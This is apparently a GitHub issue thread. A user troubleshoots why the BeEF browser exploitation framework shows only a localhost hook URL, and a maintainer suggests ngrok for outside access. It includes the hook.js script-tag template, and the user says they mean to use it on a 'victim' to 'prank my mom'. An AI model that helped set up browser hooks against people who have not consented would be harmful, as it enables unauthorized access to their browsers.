### ISSUE TITLE
Wont display IP address for the hook other than the demo page.

### ISSUE THREAD

**Issue by 3dpro45** [beefproject/beef#2564]
## First Steps

1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
3. BeEF Version: 0.5.4.0
4. Ruby Version: 3.0.4p208
5. Browser Details (e.g. Chrome v81.0): Firefox 91.11.0esr
6. Operating System (e.g. OSX Catalina): Kali Linux

## Configuration

1. Have you made any changes to your BeEF configuration? Yes, but they were reverted.
2. Have you enabled or disabled any BeEF extensions? Yes but they were reverted.

## Steps to Reproduce

1. Followed the instructions on this page EXACTLY as it says.

2. Start up works fine, but under "Hook:" in the terminal, where the hook address should be, it says "<script src="http://<IP>:3000/hook.js"></script>"

3. All other functions work fine except for that. 

(Note: It says in the start up output in the terminal, when using the default "beef start" application, that Geoip is missing. It also says in the config file that the Geoip db file is "usr/share/GeoIP/GeoLite2-City.mmdb" while this file does not exist. I believe this is why I'm having such a problem.)

## How to enable and capture detailed logging

1. Edit `config.yaml` in the root directory
   * If using Kali **beef-xss** the root dir will be  `/usr/share/beef-xss`
5. Update `client_debug` to `true`
6. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
7. Retrieve your server-side logs from `~/.beef/beef.log`
   * If using **beef-xss** logs found with `journalctl -u beef-xss`

**If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**

Very frustrating when everyone says how to do it a different way, and none of them work. I just wanted to prank my mom. I have tried 2 different ways of starting beef and have searched the innerwebs for hours on end and I know that when I finally get it to work, I'm gonna feel like a total idiot. Plllllllsssss help.

BTW I have been trying to use Apache2 for this, and idk if thats the problem.

**Comment by bcoles** [comment]
Clone BeEF from the GitHub repository.

**Comment by 3dpro45** [comment]
> Clone BeEF from the GitHub repository.

Yes, I did.

**Comment by bcoles** [comment]
What output do you get in terminal?

**Comment by 3dpro45** [comment]
> What output do you get in terminal?

I don't have my pc rn, but it basically just says that geoip is missing and therfore cannot give me the hook ip to use on my victom. It only gives the local host which obviously won't work on another vm/pc. I've tryed using the apache2 server service, but I get the same result. The only other server I know of to use is linode.

**Comment by bcoles** [comment]
> > What output do you get in terminal?
> 
> I don't have my pc rn, but it basically just says that geoip is missing and therfore cannot give me the hook ip to use on my victom. It only gives the local host which obviously won't work on another vm/pc. I've tryed using the apache2 server service, but I get the same result. The only other server I know of to use is linode.

Please clearly state the problem you're having and provide logs or screenshots to demonstrate.

**Comment by 3dpro45** [comment]
> > > What output do you get in terminal?
> > 
> > 
> > I don't have my pc rn, but it basically just says that geoip is missing and therfore cannot give me the hook ip to use on my victom. It only gives the local host which obviously won't work on another vm/pc. I've tryed using the apache2 server service, but I get the same result. The only other server I know of to use is linode.
> 
> Please clearly state the problem you're having and provide logs or screenshots to demonstrate.

I'm sorry that I didn't describe very well, I will give the full output log when I have my pc avaliable. Sorry.

**Comment by 3dpro45** [comment]
I will also have ss with arrows and what not.

**Comment by bcoles** [comment]
It sounds like you might be trying to configure BeEF to be accessible outside your LAN. Try ngrok:

https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

**Comment by 3dpro45** [comment]
> It sounds like you might be trying to configure BeEF to be accessible outside your LAN. Try ngrok:
> 
> https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

Sorry I didn't respond with info, school just started and I won't have any time to send pictures. I think you may have fixed my problem. I will try to respond if it doesn't work but anyways, thanks for the help!

**Comment by 3dpro45** [comment]
> It sounds like you might be trying to configure BeEF to be accessible outside your LAN. Try ngrok:
> 
> https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

hey, i tryed following the wiki, but it still wont work. any other suggestions?

**Comment by bcoles** [comment]
> > It sounds like you might be trying to configure BeEF to be accessible outside your LAN. Try ngrok:
> > https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok
> 
> hey, i tryed following the wiki, but it still wont work. any other suggestions?

https://github.com/beefproject/beef/issues?q=is%3Aissue+is%3Aopen+ngrok

**Comment by 3dpro45** [comment]
> > > It sounds like you might be trying to configure BeEF to be accessible outside your LAN. Try ngrok:
> > > https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok
> > 
> > 
> > hey, i tryed following the wiki, but it still wont work. any other suggestions?
> 
> https://github.com/beefproject/beef/issues?q=is%3Aissue+is%3Aopen+ngrok

^^^^^^^^
